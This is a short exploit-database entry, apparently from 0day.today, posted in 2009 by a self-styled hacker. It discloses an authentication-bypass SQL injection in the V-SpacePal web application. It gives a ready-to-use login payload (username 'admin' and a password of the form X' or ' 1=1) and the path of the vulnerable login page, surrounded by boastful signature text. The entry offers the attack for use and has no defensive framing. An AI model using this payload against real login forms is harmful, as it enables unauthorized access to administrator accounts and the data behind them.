V-SpacePal SQL Injection Vulnerability

2009-12-16T00:00:00
ID 1337DAY-ID-10295
Type zdt
Reporter R3d-D3v!L
Modified 2009-12-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================
V-SpacePal SQL Injection Vulnerability
======================================

[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[?]
[~] Vendor: www.datachecknh.com
[?]
[?] Software: V-SpacePal
[?] Price $29.95 (One-time fee)
[?] author: ((R3d D3v!L))
[?]
[?] Date: 15.12.2009
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
 
[?] ERR0R CONSOLE
 
NOT FOUND CHAR_(N0T NULL)
 
[?]SECURE ALERT FR0M 7h3 R3d-D3V!L
 
[?] Exploit:
 
[?] User Name : admin
 
 
[?] password : X' or ' 1=1
 
[?]demo:
 
[?]server/VSPACEDemo/login.asp
 
N073:
R34L R3d-D3V!L WAS h3R3 ((?0NE NAME 7h3Y ALL FA!R ?))
 
4R48!4N-HACK3R!!



#  0day.today [2018-02-19]  #